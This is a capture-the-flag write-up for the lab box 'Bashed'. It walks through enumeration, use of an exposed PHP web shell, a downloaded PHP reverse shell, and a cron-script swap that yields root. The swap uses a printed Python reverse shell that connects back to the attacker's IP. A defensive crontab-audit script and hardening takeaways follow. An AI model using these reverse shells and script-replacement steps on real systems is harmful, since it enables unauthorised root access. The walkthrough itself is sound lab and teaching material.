Another OSCP-like Box: Bashed
This is my fifth writeup for this series.
Enumeration
As usual, I started my enumeration with Nmap.
sudo nmap -sC -sV 10.10.10.68 -oA default-scan
I only saw TCP port 80 open on this box. I then ran Masscan across the full TCP range to confirm that nothing else was listening.
sudo masscan -p1-65535 -i tun0 10.10.10.68
Since HTTP was running on the host, I then used Gobuster to check for any exposed folders.
sudo apt install gobuster
sudo gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
I browsed the exposed folders and found some interesting files in the /dev directory.
The phpbash.php file was a web shell.
Exploitation
I ran “id” to check which user the web shell was running as.
Since the box runs PHP, I used the PHP reverse shell from Pentestmonkey (Kali ships a copy under /usr/share/laudanum).
locate php-reverse-shell
cp /usr/share/laudanum/php/php-reverse-shell.php .
I then changed the IP address in the script to the IP of my Kali machine. The port in the script has to match the listener you start later.
nano php-reverse-shell.php
I saved the edited script and ran SimpleHTTPServer to host the file.
sudo python -m SimpleHTTPServer 80
In the web shell, I transferred the php-reverse-shell script to Bashed using wget. The default directory, /var/www/html/dev, is not writable, so I changed to /dev/shm, which is world-writable.
cd /dev/shm
wget http://10.10.14.7/php-reverse-shell.php
Listener
I then set up a Netcat listener on port 8888 in another terminal.
I executed the script to get a reverse shell.
php php-reverse-shell.php
I upgraded the shell to a fully interactive TTY by following this link.
whoami&&id&&hostname
Post Exploitation
Next, I moved on to escalating my privileges to root. I used Linux Smart Enumeration (lse.sh) from GitHub.
wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
I transferred Linux Smart Enumeration to /dev/shm on Bashed over the same Python web server and then executed it with the command below.
bash lse.sh -i
I noticed that www-data could run commands as the scriptmanager user through sudo with no password. I immediately switched to scriptmanager.
sudo -i -u scriptmanager
I ran Linux Smart Enumeration again as scriptmanager, but didn't get any results useful for privilege escalation. I then downloaded a tool called pspy. It watches processes being spawned, including cron jobs, without needing root privileges. The tool can be downloaded from this Github link.
I transferred the pspy binary to Bashed using wget.
wget http://10.10.14.7/pspy64s
I then made the file executable and ran it.
chmod +x pspy64s
./pspy64s
While pspy was running, I noticed that test.py ran every minute and was executed by root (UID=0).
I then searched for that test.py file. From the / directory I ran the two commands below. They list the top-level files and directories (-maxdepth 1) that are writable by scriptmanager.
find / -maxdepth 1 -writable -type f
find / -maxdepth 1 -writable -type d
I checked the /scripts directory and found the test.py script. The script was owned by scriptmanager, so I could change it if needed.
Looking at test.py, the script opens test.txt and writes a string to it.
I also noticed that the test.txt created by test.py was owned by root, which confirmed that the cron job runs the script as root. If test.py spawns a shell, that shell will run as root. I tried to edit test.py directly on Bashed but wasn't successful.
In another Kali terminal, I created a file named test.py with Nano.
nano test.py
I added the script below, making sure to use the IP address of my Kali machine and the port of my listener.
import socket, subprocess, os

# Connect back to the Kali listener (IP and port must match the nc listener).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.7", 8888))
# Point stdin, stdout and stderr of this process at the socket...
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# ...then spawn an interactive shell. Cron runs test.py as root, so the shell is root's.
p = subprocess.call(["/bin/sh", "-i"])
In the Bashed terminal running as scriptmanager, I renamed the original test.py to test.bak.
I then transferred my test.py from Kali to Bashed with wget while a Netcat listener was running on port 8888.
wget http://10.10.14.7/test.py
After a minute, the cron job ran my test.py and I got a root shell on the new Netcat listener.
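The privilege escalation above comes down to one misconfiguration: a script that root runs from cron sits in a directory a low-privileged user controls. The script below is an added example (it is not part of the original writeup or of any tool used on the box) that audits for exactly that: it parses a system-crontab (the seven-field /etc/crontab and /etc/cron.d format with a user column), pulls the absolute paths out of every command root runs, and reports each path that is not owned by a trusted UID, is group/world writable, or lives in a directory where it can be renamed and replaced, which is the test.py to test.bak trick used above. The SAMPLE_CRONTAB is constructed to mimic the job found with pspy and is not the box's real crontab; root_dir and trusted_uids are parameters of this example so it can be run against a staged directory tree.

```python
import os
import stat
from typing import Dict, List, Set

# Constructed /etc/crontab-style input for this example (m h dom mon dow user command).
# It mimics the Bashed cron job found with pspy; it is not the box's real crontab.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
# m h dom mon dow user  command
* * * * * root python /scripts/test.py
17 * * * * root run-parts --report /etc/cron.hourly
30 2 * * * backup /usr/local/bin/backup.sh --full
"""

WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH


def cron_commands(crontab_text: str, run_as: str = "root") -> List[str]:
    """Return the command part of every system-crontab entry that runs as `run_as`.

    Handles the seven-field /etc/crontab and /etc/cron.d/* format (which carries a
    user column) plus @reboot/@daily style lines. Per-user crontabs under
    /var/spool/cron have no user column and are not parsed here.
    """
    commands = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        if line.startswith("@"):
            fields = line.split(None, 2)  # @reboot user command
            if len(fields) < 3:
                continue
            user, command = fields[1], fields[2]
        else:
            fields = line.split(None, 6)  # m h dom mon dow user command
            if len(fields) < 7:
                continue
            user, command = fields[5], fields[6]
        if user == run_as:
            commands.append(command)
    return commands


def absolute_paths(command: str) -> List[str]:
    """Pick the absolute-path tokens out of a cron command line.

    'python /scripts/test.py' yields ['/scripts/test.py']: the interpreter comes
    from PATH, the script is the thing an attacker can swap out.
    """
    tokens = command.replace("&&", " ").replace(";", " ").split()
    return [tok for tok in tokens if tok.startswith("/")]


def tamper_reasons(path: str, trusted_uids: Set[int]) -> List[str]:
    """Explain how an untrusted local user could change what cron executes at `path`."""
    reasons = []
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        reasons.append("does not exist (whoever can create it controls the job)")
    else:
        if st.st_uid not in trusted_uids:
            reasons.append(f"owned by uid {st.st_uid}")
        if st.st_mode & WRITE_BITS:
            reasons.append("group/world writable")
    # A read-only file in a writable directory can still be renamed and replaced.
    # The sticky bit (as on /tmp) blocks renaming files owned by someone else.
    parent = os.path.dirname(path.rstrip("/")) or "/"
    try:
        pst = os.lstat(parent)
    except FileNotFoundError:
        return reasons
    if not pst.st_mode & stat.S_ISVTX and (
        pst.st_uid not in trusted_uids or pst.st_mode & WRITE_BITS
    ):
        reasons.append(f"parent directory {parent} allows rename/replace")
    return reasons


def audit_root_cron(crontab_text: str, root_dir: str = "/",
                    trusted_uids: Set[int] = frozenset({0})) -> Dict[str, List[str]]:
    """Map every path a root cron job touches to the reasons it looks tamperable.

    `root_dir` lets the checks run against a staged directory tree instead of the
    live filesystem; `trusted_uids` is the set of owners allowed to control root's
    jobs, normally just uid 0. Both are parameters of this example, not of cron.
    """
    findings = {}
    for command in cron_commands(crontab_text, "root"):
        for path in absolute_paths(command):
            real = os.path.join(root_dir, path.lstrip("/"))
            reasons = tamper_reasons(real, trusted_uids)
            if reasons:
                findings[path] = reasons
    return findings


if __name__ == "__main__":
    # Stand-alone run: audit the live system crontab, if this host has one.
    try:
        with open("/etc/crontab") as fh:
            live = fh.read()
    except OSError:
        live = ""
    for path, why in audit_root_cron(live).items():
        print(f"{path}: {', '.join(why)}")
```

On Bashed, /scripts/test.py would be reported as owned by the scriptmanager UID and its parent /scripts as allowing rename/replace, which is the static view of what pspy showed at runtime. Since audit_root_cron only follows paths named in the command line, a job such as run-parts /etc/cron.hourly is checked at the directory level; the scripts inside it still need their own permission review.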
Flags
Key Takeaways
- Always limit access to files and folders that are critical to the system or network, especially scripts that root runs from cron: a root-executed script writable by a low-privileged user is a direct path to root.
- Avoid leaving a web shell on a server. If there is a need for one, make sure compensating security controls are in place.
- In this writeup, we used Nmap for enumeration together with Masscan.
- For directory brute-forcing, we can use tools such as Gobuster, Dirb, Dirsearch, etc.
- For privilege escalation, we can use automated scripts such as Linux Smart Enumeration and pspy to look for possible attack surface.